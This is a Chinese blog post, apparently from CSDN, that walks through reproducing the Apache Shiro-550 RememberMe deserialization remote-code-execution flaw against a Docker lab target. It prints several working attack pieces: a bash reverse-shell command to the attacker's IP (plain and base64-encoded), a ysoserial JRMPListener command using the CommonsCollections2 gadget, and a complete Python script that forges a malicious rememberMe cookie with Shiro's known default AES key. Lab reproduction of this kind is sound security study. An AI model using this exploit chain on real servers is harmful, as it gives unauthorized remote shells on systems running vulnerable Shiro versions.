Shiro RememberMe反序列化漏洞复现(Shiro-550)

最新推荐文章于 2024-05-17 11:03:13 发布
最新推荐文章于 2024-05-17 11:03:13 发布
阅读量4.9k 收藏 16
点赞数 6
分类专栏: 漏洞复现 Web安全渗透测试笔记 文章标签: 信息安全 docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/110291162
版权

0x00 漏洞原理简要分析

官方说明:https://issues.apache.org/jira/browse/SHIRO-550

Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 :
序列化 =>AES加密 =>Base64编码操作

在识别身份的时候,需要对Cookie里的rememberMe字段解密。根据加密的顺序,不难知道解密的顺序为:
获取rememberMe cookie =>base64 decode =>解密AES =>反序列化

从这个过程中不难发现只要知道了AES密钥就可以,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。

Tips:
在平时渗透测试过程中如果遇到这样的登录框,不妨检测是否存在这个漏洞。
在这里插入图片描述
看到Response中Setcookie:rememberMe=deleteMe;
就基本可以判断存在反序列化漏洞了。
在这里插入图片描述

0x01 环境搭建

  • KALI为攻击机-192.168.88.166
  • 靶机Centos 7 docker搭建-192.168.88.102

拉去镜像

获取docker镜像
docker pull medicean/vulapps:s_shiro_1
启动docker镜像:
docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

工具准备

检查是否存在默认的key

Java Runtime 配合 bash 编码

一键打

0x02 漏洞复现

检测漏洞

python3 shiro_exploit.py -u http://192.168.88.102:8080/

结果显示密钥,存在漏洞。
在这里插入图片描述
1、制作反弹shell,Kali监听 5454端口

root@Flag:~# nc -lvp 5454

2、通过ysoserial中JRMP监听模块,监听6666端口并执行反弹shell命令,可查看反弹shell连接状况。

Java Runtime 配合 bash 编码,

bash -i >& /dev/tcp/192.168.88.166/5454 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjE2Ni81NDU0IDA+JjE=}|{base64,-d}|{bash,-i}

root@Flag:/opt/Shiro_exploit# java -cp ysoserial.jar  ysoserial.exploit.JRMPListener 6666 CommonsCollections2 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjE2Ni81NDU0IDA+JjE=}|{base64,-d}|{bash,-i}"

3、生成payload
python2 payload.py attack_ip:JRMP_port

:这里千万搞清楚是通过ysoserial中JRMP监听模块的端口 ,不是反弹shell端口,不然就会连不上。
在这里插入图片描述
payload.py 代码如下:

# -*- coding: utf-8 -*-
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
     popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
     BS = AES.block_size
     pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
     key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") # 替换密钥
     iv = uuid.uuid4().bytes
     encryptor = AES.new(key, AES.MODE_CBC, iv)
     file_body = pad(popen.stdout.read())
     base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
     return base64_ciphertext
if __name__ == '__main__':
     payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())

4、构造数据包,伪造cookie、发送payload

输入任意账号密码,记住选择rememberme选项.
在这里插入图片描述
伪造:rememberMe cookie
在这里插入图片描述
反弹shell成功
在这里插入图片描述
一键打可以参考:
http://luckyzmj.cn/posts/9db50098.html
本人比较菜,复现花费时间比较长,这里做个笔记,欢迎各位师傅一起交流。

半只特立独行的猪
关注
  • 6
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
shrio反序列化--漏洞复现
DM_LL的博客
06-12 630
shrio反序列化--漏洞复现
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,然后制作精心制作的RememberMe来执行Java反序列化攻击,例如SHIRO-550。 0x01重现此问题的步骤: 登录网站,并从cookie中获取RememberMe。 使用RememberMe cookie作为填充Oracle Attack的前缀。 加密ysoserial的序列化有效负载,以通过填充Oracle Attack制作精心制作的RememberMe。 请求带有新的RememberMe cookie的网站,以执行反序列化攻击。 攻击者无需知道RememberMe加密的密码密钥。
shiro反序列化漏洞学习(工具+原理+复现
最新发布
2401_84215240的博客
05-17 1266
工具准备2.冰蝎 C:\Users\ali\Desktop\tools\Behinder_v4.0.63.shiro反序列化 图形化工具4.shiro反序列化 命令行工具一.Shiro-550 CVE-2016-4437序列化:在Java中,把Java对象转换为字节序列(json/xml)的过程叫序列化。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化Shiro反序列化:Apache。
Apache Shiro remember Me反序列化漏洞Shiro 550复现
一位热爱网安的年轻人的博客
01-11 1056
Apache Shiro remember Me反序列化漏洞Shiro 550复现
Shiro RememberMe 1.2.4 反序列化漏洞复现
baidu_38844729的博客
04-21 1454
漏洞分析 Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞 环境搭建 使用docker复现漏洞环境 docker pull medicean/vula...
Shiro RememberMe 反序列化漏洞
hbxf_xs的博客
11-27 2008
Apache Shiro 反序列化漏洞 1)、Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理: 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作(未作
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro版本时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后反序列化。但在这个过程中,其AES的Key硬编码,导致反序列化漏洞的...
shiro反序列化漏洞利用工具
11-09
Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴...
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
与项目相关文章首发于:Shiro exp使用手册Shiro rememberMe反序列化漏洞漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
第03篇:Shiro 反序列化漏洞利用汇总1
08-03
本文主要关注Shiro中的两个安全漏洞,一个是RememberMe反序列化漏洞Shiro-550),另一个是Padding Oracle Attack(Shiro-721),以及如何进行自动化漏洞利用。 1. Shiro RememberMe反序列化漏洞Shiro-550) 这...
Shiro的 rememberMe 功能使用指导(为什么rememberMe设置了没作用?)
热门推荐
软件哲学
07-05 3万+
很多人现在都倾向于使用成型的权限认证框架Shiro,并且shiro的官方文档说它帮你实现了rememberMe。多么美好的诱饵啊!但是我们实际用起来的时候却发现不是我们想的那样的,那么shiro的 rememberMe究竟是怎么用的,为什么rememberMe设置了没作用?本文会针对原理来解释,并给出解决方案
漏洞复现】最简洁的Shiro RememberMe 1.2.4 反序列化命令执行漏洞
T_Snail_T的博客
04-03 4359
0x00 前言 最近在内网进行测试,朋友跟我说在内网这种漏洞比较多,记得这个漏洞是很久之前就爆出来了,当时只是看了一下复现文档,没有进行实操,正好这次复现了,在这里记录一下,而且我这里使用的办法比网上大部分文章都相对简洁,很适合跟我一样的小白复现。 0x01 服务器环境安装 直接使用docker进行环境的安装 docker pull medicean/vulapps:s_shiro_1 安装好...
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1439
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
[Java安全]Shiro RememberMe 1.2.4反序列化漏洞分析
Y4tacker的博客
07-26 751
文章目录写在前面Shiro RememberMe 1.2.4反序列化漏洞Payload 写在前面 Payload来自P神的Github Shiro RememberMe 1.2.4反序列化漏洞Shiro 1.2.4版本之前内置了一个默认且固定的加密 Key,导致攻击者可以伪造任意的rememberMe,进而触发反序列化漏洞,在这里我们还是配合TemplatesImpl执行字节码,但是如果使用Transformer数组则会报错,因为反序列化流中包含非Java自身的数组,则会出现无法加载类的错误 Trans
实现shiro-remember功能
Scofield_No1的博客
03-14 2125
首先说一下rememberMe是什么, 通俗的说就是 你登录百度以后,选择记住我,关闭浏览器之后打开百度,发现你还是登录状态,这样就是RememberMe 在这里,我们假设已经实现了shiro的基本登录功能。 首先是页面 userName<input type="text"id="userName" name="userName"value="<shiro:principal/>" /><br
shiro-550反序列化漏洞
weixin_66717977的博客
03-21 1155
基于docker的shrio反序列化漏洞复现
Shiro(十):shiro RememberMe(记住我)
12程序猿的博客
10-29 1997
shiro RememberMe(记住我) 一、概述 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问, 基本流程如下: 首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的Cookie 写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端还是知道你是谁,且能正常访问; 但是比如我们访问淘宝时,如果要
shiro-550反序列化漏洞shiro-721反序列化漏洞的区别
04-13
这是一个技术问题,Shiro-550漏洞Shiro-721漏洞都是Apache Shiro框架中的反序列化漏洞,但Shiro-550漏洞主要是由于使用了不安全的Java反序列化进行身份验证,而Shiro-721漏洞主要是由于Shiro的rememberMe功能中存在的反序列化漏洞,两者的攻击方式和影响范围略有不同。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值